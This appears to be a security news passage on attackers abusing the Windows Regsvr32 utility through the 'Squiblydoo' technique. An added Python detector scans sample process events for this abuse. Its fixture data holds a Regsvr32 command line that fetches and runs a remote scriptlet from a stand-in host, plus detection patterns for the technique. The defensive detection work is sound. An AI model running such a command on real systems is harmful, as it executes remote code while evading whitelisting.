A Windows living-off-the-land binary (LOLBin) known as Regsvr32 is seeing a big uptick in abuse of late, researchers are warning, mainly spreading trojans like Lokibot and Qbot.
LOLBins are legitimate, native utilities used daily in various computing environments that cybercriminals use to evade detection by blending into normal traffic patterns. In this case, Regsvr32 is a Microsoft-signed command-line utility in Windows that allows users to register and unregister libraries. By registering a .DLL file, information is added to the central directory (the Registry) so that it can be used by Windows and shared among programs.

This long reach is catnip to cyberattackers, who can abuse the utility via the “Squiblydoo” technique, Uptycs researchers warned. “Threat actors can use Regsvr32 for loading COM scriptlets to execute DLLs,” they explained in a Wednesday writeup. “This method does not make changes to the Registry as the COM object is not actually registered, but [rather] is executed. This technique [allows] threat actors to bypass application whitelisting during the execution phase of the attack kill chain.”
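Because Squiblydoo leaves no Registry trace, the practical detection point is process-creation telemetry. The following is an added example (not from the article or from Uptycs) that scans constructed Sysmon-style process-creation records for the traits defenders typically key on: regsvr32.exe loading the scriptlet host scrobj.dll (the COM scriptlet loader the technique relies on, which the article does not name), an `/i:` argument pointing at a remote URL, and an Office or script-host parent process. The event field names and sample values are assumptions made up for the example.

```python
import re

# Constructed Sysmon-style process-creation records (not real telemetry).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s /i:http://203.0.113.10/update.sct scrobj.dll",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"image": r"C:\Windows\System32\regsvr32.exe",          # benign install
     "cmdline": r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"',
     "parent": r"C:\Windows\System32\msiexec.exe"},
    {"image": r"C:\Windows\SysWOW64\regsvr32.exe",          # local scriptlet
     "cmdline": r"regsvr32.exe /s /i:C:\Users\Public\inst.sct scrobj.dll",
     "parent": r"C:\Windows\System32\wscript.exe"},
    {"image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe", "parent": r"C:\Windows\explorer.exe"},
]

# /i: (install argument) followed by a remote scheme, in any case.
REMOTE_SCRIPTLET = re.compile(r"/i:\s*(https?|ftp)://", re.I)
# The scriptlet host DLL that executes COM scriptlets without registering them.
SCROBJ = re.compile(r"\bscrobj\.dll\b", re.I)
# Parents that should rarely, if ever, launch regsvr32 in a managed estate.
SUSPICIOUS_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                      "wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe")


def regsvr32_findings(event):
    """Return the reasons (possibly none) an event looks like Squiblydoo-style abuse."""
    if not event["image"].lower().endswith("\\regsvr32.exe"):
        return []
    cmd = event["cmdline"]
    reasons = []
    if SCROBJ.search(cmd):
        reasons.append("scrobj.dll scriptlet host loaded")
    if REMOTE_SCRIPTLET.search(cmd):
        reasons.append("/i: argument points at a remote URL")
    parent = event["parent"].lower().rsplit("\\", 1)[-1]
    if parent in SUSPICIOUS_PARENTS:
        reasons.append(f"spawned by {parent}")
    return reasons


def scan(events):
    """Return (command line, reasons) for every event that triggers at least one rule."""
    hits = []
    for event in events:
        reasons = regsvr32_findings(event)
        if reasons:
            hits.append((event["cmdline"], reasons))
    return hits


if __name__ == "__main__":
    for cmdline, reasons in scan(SAMPLE_EVENTS):
        print(cmdline, "->", "; ".join(reasons))
```

A plain `regsvr32 /s vendor.dll` from an installer is normal and is deliberately not flagged; treat scrobj.dll plus a remote `/i:` target as the high-confidence combination and a lone suspicious parent as a triage signal.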
Source: threatpost.com, “Cybercriminals Swarm Windows Utility Regsvr32 to Spread Malware”: The living-off-the-land binary (LOLBin) is anchoring a rash of cyberattacks bent on evading security detection to drop Qbot and Lokibot.